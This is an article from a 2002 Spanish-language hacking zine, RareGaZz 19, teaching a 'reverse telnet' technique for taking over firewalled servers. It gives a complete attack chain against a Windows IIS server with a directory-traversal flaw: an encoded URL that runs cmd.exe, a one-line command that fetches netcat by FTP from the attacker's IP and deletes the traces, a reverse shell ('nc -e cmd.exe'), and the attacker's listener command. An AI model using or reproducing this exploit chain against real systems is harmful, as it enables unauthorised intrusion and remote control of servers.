RareGaZz19:(rgz_0E):27/03/2002 << Back To RareGaZz19


: :.:..:...:....:.....:......:.......:........:.........:..........: : : :::: : : : : RGZ_0E Telnet Inverso Hacking ^Shadown^ : :.:..:...:....:.....:......:.......:........:.........:..........: : : :::: Holas, desde hace algo de tres a~os y pico que integro el grupo, y hasta ahora no habia escrito ningun articulo, si bien colabore en la elaboracion de algunos, todavia no habia escrito ninguno completamente desarrollado por mi. Asi que bueno...llego el momento de hacer algunas colaboraciones. Espero que les sea de utilidad a todos los que tienen dudas de como hacer algunas cosas, como por ejemplo pasar un firewall. -0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0 El tema que voy a describir es el telnet inverso y como aplicarlo para sacar beneficio ;-). Muchas veces me encontre con gente con conocimientos diversos de seguridad y que por no conocer esta tecnica no pudieron apoderarse de algun sevidor en el cual podian ejecutar codigos arbitrarios. La cosa es asi, que sucede cuando nos encontramos frente a un servidor el cual esta firewallado y el unico puerto que tenemos abierto es el 80 para accederlo?, bueno, la cosa es muy sencilla, evidentemente nosotros no podemos telnetearlo pues no tenemos acceso, tampoco podemos tomar el GUI de la maquina porque tampoco tenemos habilitado un puerto que lo permita... pues entonces que hacemos? , la respuesta es sencilla si no podemos telnetear nosotros, haremos que el servidor nos telnetee a nosotros.(osea hacer un telnet inverso) Que? que como hago eso? , simple, seguramente muchos de ustedes deben haber oido por ahi que hay una aplicacion llamada Netcat, que todo el mundo la llama la navaja suiza, y muchos se habran preguntado porque. El netcat es una estupenta herramienta que sirve para realmente muchisimas cosas como scanear tcp, udp, usarlo como telnet... etc. y entre ellas esta la opcion de hacer que realize un telnet hacia algun objetivo que este en escucha y que le envie una seccion de sh o cmd.exe en este caso. (sh para *nix y cmd.exe para nt/2k). Bueno vamos a ver como funciona esto con un ejemplo practico. Supongamos que estamos atacando un servidor Nt con IIS que es vulnerable a alguna falla de codigo transversal que nos permite ejecutar comandos sobre ese server, pero que esta detras de un firewall. Esto puede aplicarse sobre cualquier sistema objetivo en el cual podamos ejecutar comandos, ovbiamente van a variar los comandos que ejecutemos de acuerdo al OS remoto. Probablemente el servidor SI puede salir hacia internet. (pero en muchos casos no). Tenemos que hacer que el servidor se conecte a un ftp en el que este el nc.exe (netcat) y que lo baje. Y luego hacer que el nc se ejecute con algunos parametros. Esto lo podemos automatizar y hacer que realice todas estas operaciones de una sola vez. Primero que tenemos que levantar un servidor ftp en nuestra maquina (puede ser un Serv-U (nt) o un wu-ftpd (*nix), creamos una cuenta y un pass, y vamos a poner el nc.exe en el directorio inicial de nuestro servidor de ftp. Y luego le pasamos la lista de comandos al server objetivo. La secuencia seria la siguiente: "cd %systemroot% && echo shadown > ftptmp && echo abracadabra >> ftptmp && echo bin >> ftptmp && echo get nc.exe >> ftptmp && echo bye >> ftptmp && ftp -s:ftptmp mi_ip && del ftptmp && attrib -r nc.exe && nc -e cmd.exe mi_ip 80" que en el browser quedaria asi: http://server_ip/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+"cd %systemroot% && echo shadown > ftptmp && echo abracadabra >> ftptmp && echo bin >> ftptmp && echo get nc.exe >> ftptmp && echo bye >> ftptmp && ftp -s:ftptmp mi_ip && del ftptmp && attrib -r nc.exe && nc -e cmd.exe mi_ip 80" de esta forma hacemos un archivo llamado ftptmp el cual va a contener el user y pass , y los comandos que tiene que ejecutar para bajarse el nc, luego ejecutamos el ftp -s para que haga lo que dice el archivo (ftptmp en nuestro caso), luego borramos el ftptmp y ejecutamos el nc.exe con para que se conecte a nosotros con la consola del servidor. =) Algo importante, en nuestra maquina tenemos que tener el levantado el nc en escucha para que el server se conecte con nosotros. Esto se hace asi. nc -vv -l -p 80 -vv = very verbose -l = listen (escucha) -p = puerto Entonces, primero levantamos el nc en escucha y nuestra maquina y luego le decimos al server lo que tiene que hacer, y lo esperamos con un caluroso abrazo receptivo en nuestro equipo ;-) Una vez que el server esta tomado, es solo cuestion de la imaginacion de cada uno lo que puede hacerse. Bueno esto es todo, espero que les sea util y que hayan aprendido algo nuevo. A los que aprendieron que lo disfruten y a los que conocian sorry "algo" tenia que escribir. <<::RareGaZz::>>